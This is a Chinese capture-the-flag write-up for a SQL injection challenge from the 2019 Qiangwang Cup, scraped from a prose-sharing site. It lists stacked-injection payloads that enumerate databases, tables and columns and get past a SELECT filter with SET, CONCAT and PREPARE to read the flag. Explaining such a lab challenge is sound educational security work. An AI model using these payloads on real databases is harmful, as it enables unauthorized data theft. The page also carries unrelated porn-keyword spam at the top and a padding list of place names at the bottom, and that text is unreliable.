最美情侣中文字幕电影,在线麻豆精品传媒,在线网站高清黄,久久黄色视频

歡迎光臨散文網(wǎng) 會員登陸 & 注冊

BUU-Web-[強網(wǎng)杯 2019]隨便注1

2021-04-18 18:23 作者:雨落雪辰  | 我要投稿

這是一道SQL注入題

先進行簡單是注入操作,發(fā)現(xiàn)了敏感庫名‘supersqli’【1';show databases;】

當然我們也可以查看其他庫里的內容【1';show tables from supersqli;】

要素察覺!

然后我們嘗試查看丑表【1';show columns from `1919810931114514`;】注意這里對丑表的表名需要添加反引號``

當我們嘗試把flag用SELECT取出時發(fā)現(xiàn)SELECT被進行了過濾

這里可以嘗試使用堆疊注入,進行預處理【1';SET @b=CONCAT('SEL','ECT flag FROM `1919810931114514`;');PREPARE a FROM @b;execute a;】

對使用的命令進行總結

  • show databases;? ?查看數(shù)據(jù)庫

  • show tables from [databases_name]? ?查看該數(shù)據(jù)庫中的表名

  • show columns from [table_name]????查看該表中的字段

  • SELSECT [value]?from? [columns_name] 查詢該字段下的vulue這條數(shù)據(jù)的內容

  • SET? ?@b = [XXX]?????設置變量@b為xxxx

  • CONCAT(a,b)????????????將a,b內容進行拼接

  • PREPARE a from @b;???????定義預處理語句將預處理語句說明為a

  • EXECUTE a;????????執(zhí)行預處理語句


BUU-Web-[強網(wǎng)杯 2019]隨便注1的評論 (共 條)

分享到微博請遵守國家法律
政和县| 贞丰县| 拜泉县| 高台县| 双柏县| 巴青县| 灵山县| 上栗县| 应城市| 新建县| 新沂市| 本溪市| 乐东| 荣昌县| 邹平县| 盐城市| 韶山市| 兴和县| 新建县| 县级市| 安阳市| 南京市| 马公市| 兴山县| 大名县| 乐昌市| 响水县| 会宁县| 池州市| 安庆市| 天柱县| 墨玉县| 桐乡市| 赤水市| 辽源市| 醴陵市| 吴忠市| 朝阳县| 栾川县| 纳雍县| 寿宁县|